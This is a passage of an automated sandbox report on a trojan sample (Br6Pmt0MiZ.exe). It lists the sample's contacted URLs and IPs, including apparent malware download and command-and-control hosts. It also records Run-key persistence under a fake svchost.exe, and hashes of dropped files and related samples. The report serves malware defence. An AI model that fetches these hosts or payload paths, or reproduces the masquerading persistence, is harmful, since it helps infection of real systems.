http://api.wipmania.com	Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/htt	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sccect	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	false		high
http://zzruuoooshfrohu.su/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://Passport.NET/STS09/xmldsig#ripledes-cbc48496-2624191407-3283318427-1255436723	svchost.exe, 00000023.00000003.1113215680.0000019B88951000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://universalstore.streaming.mediaservicendow	svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://api.wipmania.com/s%	Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	false		high
http://tsrv3.ru/4	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tsrv3.ru/5	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tldrbox.top/	Br6Pmt0MiZ.exe	true	Avira URL Cloud: safe	unknown
http://tsrv3.ru/6	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp	false		high
http://tsrv5.top/	Br6Pmt0MiZ.exe	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID	svchost.exe, 00000023.00000002.1628490987.0000019B880D6000.00000004.00000001.sdmp	false		high
http://tldrbox.top/6	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://tldrbox.top/5	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://tsrv3.ru/1	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hulu.com/ca-privacy-rights	svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	false		high
http://tsrv3.ru/2	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	false		high
http://tsrv3.ru/3	svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000F.00000002.309612750.00000222DD029000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 00000021.00000003.562826880.00000229F1D5B000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562652421.00000229F1DB5000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	false		high
http://185.215.113.10/6http://185.215.113.10/2	svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://zzruuoooshfrohu.su/5	svchost.exe, 00000001.00000003.1070697316.0000000000873000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.10	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
212.83.168.196	unknown	France	12876	OnlineSASFR	true
64.70.19.203	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	340673
Start date:	18.01.2021
Start time:	00:39:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Br6Pmt0MiZ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@21/15@11/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 97.3%) Quality average: 85.9% Quality standard deviation: 24.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Max analysis timeout: 720s exceeded, the analysis took too long Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 51.132.208.181, 92.122.144.200, 92.122.213.247, 92.122.213.194, 20.54.26.129, 67.27.157.126, 67.27.158.254, 67.26.75.254, 8.248.133.254, 67.27.157.254, 52.155.217.156, 40.126.31.1, 40.126.31.6, 40.126.31.135, 40.126.31.137, 40.126.31.8, 40.126.31.141, 40.126.31.139, 20.190.159.136, 20.49.150.241, 51.11.168.232, 40.127.240.158, 20.190.159.132, 20.190.159.138, 40.126.31.143, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:40:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\16642873124159\svchost.exe
00:40:35	API Interceptor	17x Sleep call for process: svchost.exe modified
00:40:35	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\16642873124159\svchost.exe
00:40:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\16642873124159\svchost.exe
00:41:51	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.215.113.10	kmHFEwF36g.exe	Get hash	malicious	Browse	tldrbox.top/6
	gDwloA889i.exe	Get hash	malicious	Browse	worm.ws/6
	lhRYDNY8fN.exe	Get hash	malicious	Browse	tsrv4.ws/23.exe
212.83.168.196	R5JbUb3muW.exe	Get hash	malicious	Browse	api.wipmania.com/
	kmHFEwF36g.exe	Get hash	malicious	Browse	api.wipmania.com/
	gDwloA889i.exe	Get hash	malicious	Browse	api.wipmania.com/
	VkTXaNHTs6.exe	Get hash	malicious	Browse	api.wipmania.com/
	Z36PyL1ZTd.exe	Get hash	malicious	Browse	api.wipmania.com/
	wNtMSZRvzI.exe	Get hash	malicious	Browse	api.wipmania.com/
	y7ddF1vGqA.exe	Get hash	malicious	Browse	api.wipmania.com/
	Q82Mz7lCKa.exe	Get hash	malicious	Browse	api.wipmania.com/
	6FRRo6QFF2.exe	Get hash	malicious	Browse	api.wipmania.com/
	Photo-138-199.jpg.exe	Get hash	malicious	Browse	api.wipmania.com/
	rXyLfG57OF.exe	Get hash	malicious	Browse	api.wipmania.com/
	9v7gUCpZOr.exe	Get hash	malicious	Browse	api.wipmania.com/
	1rP65UzlyY.exe	Get hash	malicious	Browse	api.wipmania.com/
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	api.wipmania.com/
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	api.wipmania.com/
	FvMmgHMTT3.exe	Get hash	malicious	Browse	api.wipmania.com/
	e621ca05.exe	Get hash	malicious	Browse	api.wipmania.com/
	1fed6b9a.exe	Get hash	malicious	Browse	api.wipmania.com/
	Ctpmpo.exe.exe	Get hash	malicious	Browse	api.wipmania.com/
	Lsngnr.exe	Get hash	malicious	Browse	api.wipmania.com/
64.70.19.203	R5JbUb3muW.exe	Get hash	malicious	Browse	thaus.ws/6
	kmHFEwF36g.exe	Get hash	malicious	Browse	thaus.ws/1
	VkTXaNHTs6.exe	Get hash	malicious	Browse	eaffuebudbeudbbk.ws/6
	wNtMSZRvzI.exe	Get hash	malicious	Browse	eafuebdbedbedggk.ws/4
	y7ddF1vGqA.exe	Get hash	malicious	Browse	deauduafzgezzfgk.ws/3
	6FRRo6QFF2.exe	Get hash	malicious	Browse	wduufbaueeubffgu.ws/5
	Photo-149-101.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	winsvcs.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	Photo-137-158.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	9v7gUCpZOr.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/2
	1rP65UzlyY.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/5
	JAGk3xeQ5I.exe	Get hash	malicious	Browse	geueudusl.ws/vnc/2
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	fheuhdwdzwgzdggu.ws/2
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	wduufbaueeubffgr.ws/2
	jHbg4HhuFN.exe	Get hash	malicious	Browse	deauduafzgezzfgr.ws/5
	Olalq9sdOF.exe	Get hash	malicious	Browse	tpleflpokadkeoot.ws/pe/1
	http://aptekanasza.home.pl	Get hash	malicious	Browse	r.mega-us-pills.ws/?snitch&se_referrer=&default_keyword=Apteka%20Nasza&keyword=Apteka%20Nasza

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.wipmania.com	R5JbUb3muW.exe	Get hash	malicious	Browse	212.83.168.196
	kmHFEwF36g.exe	Get hash	malicious	Browse	212.83.168.196
	gDwloA889i.exe	Get hash	malicious	Browse	212.83.168.196
	VkTXaNHTs6.exe	Get hash	malicious	Browse	212.83.168.196
	Z36PyL1ZTd.exe	Get hash	malicious	Browse	212.83.168.196
	wNtMSZRvzI.exe	Get hash	malicious	Browse	212.83.168.196
	y7ddF1vGqA.exe	Get hash	malicious	Browse	212.83.168.196
	Q82Mz7lCKa.exe	Get hash	malicious	Browse	212.83.168.196
	6FRRo6QFF2.exe	Get hash	malicious	Browse	212.83.168.196
	Photo-138-199.jpg.exe	Get hash	malicious	Browse	212.83.168.196
	rXyLfG57OF.exe	Get hash	malicious	Browse	212.83.168.196
	9v7gUCpZOr.exe	Get hash	malicious	Browse	212.83.168.196
	1rP65UzlyY.exe	Get hash	malicious	Browse	212.83.168.196
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	212.83.168.196
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	212.83.168.196
	FvMmgHMTT3.exe	Get hash	malicious	Browse	212.83.168.196
	e621ca05.exe	Get hash	malicious	Browse	212.83.168.196
	1fed6b9a.exe	Get hash	malicious	Browse	212.83.168.196
	Ctpmpo.exe.exe	Get hash	malicious	Browse	212.83.168.196
	Lsngnr.exe	Get hash	malicious	Browse	212.83.168.196
thaus.ws	R5JbUb3muW.exe	Get hash	malicious	Browse	64.70.19.203
thaus.ws	kmHFEwF36g.exe	Get hash	malicious	Browse	64.70.19.203
tldrbox.top	kmHFEwF36g.exe	Get hash	malicious	Browse	185.215.113.10
	http://tldrbox.top/2.exe	Get hash	malicious	Browse	88.218.16.27
	http://tldrbox.top/1.exe	Get hash	malicious	Browse	88.218.16.27
zzruuoooshfrohu.su	R5JbUb3muW.exe	Get hash	malicious	Browse	185.215.113.10
zzruuoooshfrohu.su	kmHFEwF36g.exe	Get hash	malicious	Browse	185.215.113.10
tsrv4.ws	R5JbUb3muW.exe	Get hash	malicious	Browse	185.215.113.10
	kmHFEwF36g.exe	Get hash	malicious	Browse	185.215.113.10
	lhRYDNY8fN.exe	Get hash	malicious	Browse	185.215.113.10
	VkTXaNHTs6.exe	Get hash	malicious	Browse	45.182.189.251

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CENTURYLINK-LEGACY-SAVVISUS	R5JbUb3muW.exe	Get hash	malicious	Browse	64.70.19.203
	kmHFEwF36g.exe	Get hash	malicious	Browse	64.70.19.203
	990109.exe	Get hash	malicious	Browse	192.252.154.18
	NormhjTcQb.exe	Get hash	malicious	Browse	208.150.117.234
	VkTXaNHTs6.exe	Get hash	malicious	Browse	64.70.19.203
	SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe	Get hash	malicious	Browse	206.99.201.61
	wNtMSZRvzI.exe	Get hash	malicious	Browse	64.70.19.203
	y7ddF1vGqA.exe	Get hash	malicious	Browse	64.70.19.203
	qkN4OZWFG6.exe	Get hash	malicious	Browse	192.252.154.18
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	192.252.154.18
	6FRRo6QFF2.exe	Get hash	malicious	Browse	64.70.19.203
	Photo-149-101.jpg.exe	Get hash	malicious	Browse	64.70.19.203
	winsvcs.exe	Get hash	malicious	Browse	64.70.19.203
	Photo-137-158.jpg.exe	Get hash	malicious	Browse	64.70.19.203
	9v7gUCpZOr.exe	Get hash	malicious	Browse	64.70.19.203
	1rP65UzlyY.exe	Get hash	malicious	Browse	64.70.19.203
	JAGk3xeQ5I.exe	Get hash	malicious	Browse	64.70.19.203
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	64.70.19.203
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	64.70.19.203
	FalcoChessSetup.exe	Get hash	malicious	Browse	165.193.78.234
WHOLESALECONNECTIONSNL	7hM1UvCQQ2.exe	Get hash	malicious	Browse	185.215.113.88
	R5JbUb3muW.exe	Get hash	malicious	Browse	185.215.113.10
	SecuriteInfo.com.Trojan.DownLoader36.32796.17922.exe	Get hash	malicious	Browse	185.215.113.77
	kmHFEwF36g.exe	Get hash	malicious	Browse	185.215.113.10
	67BWjrhB22.exe	Get hash	malicious	Browse	185.215.113.77
	gDwloA889i.exe	Get hash	malicious	Browse	185.215.113.10
	lhRYDNY8fN.exe	Get hash	malicious	Browse	185.215.113.10
OnlineSASFR	u.exe	Get hash	malicious	Browse	51.15.191.226
	p.exe	Get hash	malicious	Browse	51.15.191.226
	R5JbUb3muW.exe	Get hash	malicious	Browse	212.83.168.196
	Manager[1].exe	Get hash	malicious	Browse	51.159.92.13
	http://fake-cash-app-screenshot-generator.hostforjusteasy.fun	Get hash	malicious	Browse	62.210.110.115
	Setup_6953.exe	Get hash	malicious	Browse	195.154.53.207
	kmHFEwF36g.exe	Get hash	malicious	Browse	212.83.168.196
	rib.exe	Get hash	malicious	Browse	212.83.139.44
	DfES2eBy48.exe	Get hash	malicious	Browse	51.15.52.16
	gDwloA889i.exe	Get hash	malicious	Browse	212.83.168.196
	SecuriteInfo.com.Trojan.GenericKD.45210505.14650.exe	Get hash	malicious	Browse	51.15.65.182
	utox.exe	Get hash	malicious	Browse	163.172.84.232
	990109.exe	Get hash	malicious	Browse	212.83.152.59
	LmlSW3qU2x.exe	Get hash	malicious	Browse	51.15.206.72
	SecuriteInfo.com.Trojan.Encoder.10507.20567.exe	Get hash	malicious	Browse	62.210.89.9
	sdag45l37P.exe	Get hash	malicious	Browse	163.172.50.16
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse	51.15.176.55
	rDWclhdxMt.exe	Get hash	malicious	Browse	163.172.24.234
	VkTXaNHTs6.exe	Get hash	malicious	Browse	212.83.168.196
	sample.exe	Get hash	malicious	Browse	212.129.45.37

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\16642873124159\svchost.exe	R5JbUb3muW.exe	Get hash	malicious	Browse
C:\16642873124159\svchost.exe	kmHFEwF36g.exe	Get hash	malicious	Browse

Created / dropped Files

C:\16642873124159\svchost.exe Download File
Process:	C:\Users\user\Desktop\Br6Pmt0MiZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.880152269990318
Encrypted:	false
SSDEEP:	768:V3B5h3B6rIePg+6eBJ/uQeF9PiPiPiPBn3zDn3zDn3zDn3zehohohohohohohohj:v5h3B6rIug+6ieF9PiPiPiPBn3zDn3zh
MD5:	85C4F05BDC2C39858288C67D41DB3E86
SHA1:	7CCF8A4822B6122A16D7252033DA3536145715DE
SHA-256:	7C419F22E51F37BE0C483BBF3C320C40B6939785896B756C504AF5DE5B46237F
SHA-512:	D1D5F9ECA0201701580A2A0AFD703F00DAF7502E979A6687DE64319FD2327CA7A686C14C7B8BAB8A8AAB010D3A71E324E56BD1BD19B001B48A189601F3E0B757
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 47%, Browse Antivirus: ReversingLabs, Detection: 90%
Joe Sandbox View:	Filename: R5JbUb3muW.exe, Detection: malicious, Browse Filename: kmHFEwF36g.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$...Ez.Ez.Ez....Ez....Ez.E{..Ez..Z~.Ez.)Yt.Ez..Zp.Ez.=..Ez.=..Ez.Rich.Ez.................PE..L......_.................H...J.......V.......`....@.................................4.....@..................................u..................................t....b...............................................`...............................text....G.......H.................. ..`.rdata... ...`..."...L..............@..@.data................n..............@....rsrc...............................@..@.reloc..r...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	0.36205444996716485
Encrypted:	false
SSDEEP:	48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
MD5:	353C0E84A6C573D30B15481706263B9A
SHA1:	4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
SHA-256:	4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
SHA-512:	210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
Malicious:	false
Preview:	.............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.23765867876009214
Encrypted:	false
SSDEEP:	12:00ZGaD0JcaaD0JwQQZYAg/0bjSQJ8RVWt11eWt11:0qgJctgJwPrjSuQVWtreWtr
MD5:	6B19B4DB7AEEA7D8B8BEB04DED8B254C
SHA1:	9B65FF824E438740AB4897D7C129C74FE77FF763
SHA-256:	54548FE0DA3717417FFCCB7CE7FB76311987266965957C03E8ADC6F0B5657B32
SHA-512:	3020950A471CC33DF90430BAA889E16B88486730C56147E6D8F9FCA54B925D735388A22D6D9B580BEA56A0348F83920A8968C2884FA0D0CF1D859635AACA33A4
Malicious:	false
Preview:	......:{..(.....#(...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................#(...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xbac65459, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.09755083528864861
Encrypted:	false
SSDEEP:	12:1sA0+K6O4blUjxKPsA0+K6O4blUjxKNX0+K6O4blMxKNX0+K6O4blMxK+z0+K6Ot:Wbjb1bfbibDbSTH2UTH2
MD5:	7D9AD9412DFA5678D2AA1FEA412A03C6
SHA1:	AE0C73ED2D4E84664826A39D2CE822D8C85B716F
SHA-256:	7B5F1C2257C56A836BF3FF749D8434DE9DA3837CFA2C936BD2DC9CBAA0563612
SHA-512:	146CA864FEBBA9C883648DD2D91048953F95A96B71A1B564F7E194CA7806A6E402CC40B0D83DD2FF244FBCF87407F284E34BCD0DE6D9A353BBCF258E80C4CC2A
Malicious:	false
Preview:	..TY... ................e.f.3...w........................&..........w..#(...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................g5..#(...yUk.................!./#(...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.11466261413761301
Encrypted:	false
SSDEEP:	6:TAGIAt4i6efyGIA1CDcLJCpGPGIAtTfJLUIG5lJrGiItfJ2mG:Tjdt4iLVd1JLydtTfVUlwxf
MD5:	7C49987F5573FF51639A5834D45D10C6
SHA1:	3A06D2E50817ECF86F03C51DC5332F855DEF8E07
SHA-256:	C3C79A6ACD37C7A53B38CF362793714A8D410CCFDA698981812AEE1A6B96FDAB
SHA-512:	53373993575F23D5016F56B02140ABFA96E0084891EC17140DFFF78BE544E955D852829F61792A9AD382EE47490516F1C7A55CC4D14C7DDD1C38448F067E9498
Malicious:	false
Preview:	.y.......................................3...w..#(...y.......w...............w.......w....:O.....w...................!./#(...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\B2P1HNAE.htm Download File
Process:	C:\16642873124159\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.454822399946607
Encrypted:	false
SSDEEP:	3:HLLXrf:fXrf
MD5:	35625EB6A6060D5C131D0C9007C6616C
SHA1:	B837CA1B94E9E2121DB1261A245AB54B89A8C0D3
SHA-256:	56178287862F1C0A5BE54F46DC870016435A044FC6CE4FA03EE94BF2EACAB3B7
SHA-512:	67B6C609EE4A48C84824FEBD3EB14BDFDA5C36D7AD388182672520BAA65CDD9B8DCDDD28E3C8119AF3F0FE407C59BCA7C62E5124D8156B6BB7448F82D41DB39C
Malicious:	false
Preview:	84.17.52.74<br>XX

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\KC9HIQYE.htm Download File
Process:	C:\16642873124159\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.454822399946607
Encrypted:	false
SSDEEP:	3:HLLXrf:fXrf
MD5:	35625EB6A6060D5C131D0C9007C6616C
SHA1:	B837CA1B94E9E2121DB1261A245AB54B89A8C0D3
SHA-256:	56178287862F1C0A5BE54F46DC870016435A044FC6CE4FA03EE94BF2EACAB3B7
SHA-512:	67B6C609EE4A48C84824FEBD3EB14BDFDA5C36D7AD388182672520BAA65CDD9B8DCDDD28E3C8119AF3F0FE407C59BCA7C62E5124D8156B6BB7448F82D41DB39C
Malicious:	false
Preview:	84.17.52.74<br>XX

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\MI5J5U2B.htm Download File
Process:	C:\16642873124159\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.454822399946607
Encrypted:	false
SSDEEP:	3:HLLXrf:fXrf
MD5:	35625EB6A6060D5C131D0C9007C6616C
SHA1:	B837CA1B94E9E2121DB1261A245AB54B89A8C0D3
SHA-256:	56178287862F1C0A5BE54F46DC870016435A044FC6CE4FA03EE94BF2EACAB3B7
SHA-512:	67B6C609EE4A48C84824FEBD3EB14BDFDA5C36D7AD388182672520BAA65CDD9B8DCDDD28E3C8119AF3F0FE407C59BCA7C62E5124D8156B6BB7448F82D41DB39C
Malicious:	false
Preview:	84.17.52.74<br>XX

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\MLZ5OVMB.htm Download File
Process:	C:\Users\user\Desktop\Br6Pmt0MiZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.454822399946607
Encrypted:	false
SSDEEP:	3:HLLXrf:fXrf
MD5:	35625EB6A6060D5C131D0C9007C6616C
SHA1:	B837CA1B94E9E2121DB1261A245AB54B89A8C0D3
SHA-256:	56178287862F1C0A5BE54F46DC870016435A044FC6CE4FA03EE94BF2EACAB3B7
SHA-512:	67B6C609EE4A48C84824FEBD3EB14BDFDA5C36D7AD388182672520BAA65CDD9B8DCDDD28E3C8119AF3F0FE407C59BCA7C62E5124D8156B6BB7448F82D41DB39C
Malicious:	false
Preview:	84.17.52.74<br>XX

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\QC0A1JYU.htm Download File
Process:	C:\16642873124159\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.454822399946607
Encrypted:	false
SSDEEP:	3:HLLXrf:fXrf
MD5:	35625EB6A6060D5C131D0C9007C6616C
SHA1:	B837CA1B94E9E2121DB1261A245AB54B89A8C0D3
SHA-256:	56178287862F1C0A5BE54F46DC870016435A044FC6CE4FA03EE94BF2EACAB3B7
SHA-512:	67B6C609EE4A48C84824FEBD3EB14BDFDA5C36D7AD388182672520BAA65CDD9B8DCDDD28E3C8119AF3F0FE407C59BCA7C62E5124D8156B6BB7448F82D41DB39C
Malicious:	false
Preview:	84.17.52.74<br>XX

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11000522132016696
Encrypted:	false
SSDEEP:	12:26S8Xm/Ey6q9995J28x9dq3qQ10nMCldimE8eawHjck3:260l68rYLyMCldzE9BHjck3
MD5:	3D048E44D3141C4E7B30F184D6ADC029
SHA1:	9E14D65211F9191C790ABBDBAE3D0E927D417DD4
SHA-256:	55EBFE491A36F509C35DC5E7651CC26A688CA38EE776240327E8B1E3F258DBD6
SHA-512:	E676BDFDBB842FCE1F0344818F8608587E3A776F882AB0AAE8E9C8AF0151F601299CB355588882E467937CA7CCC3E6E39C23C0E81C32C338C68A67316FAB8A77
Malicious:	false
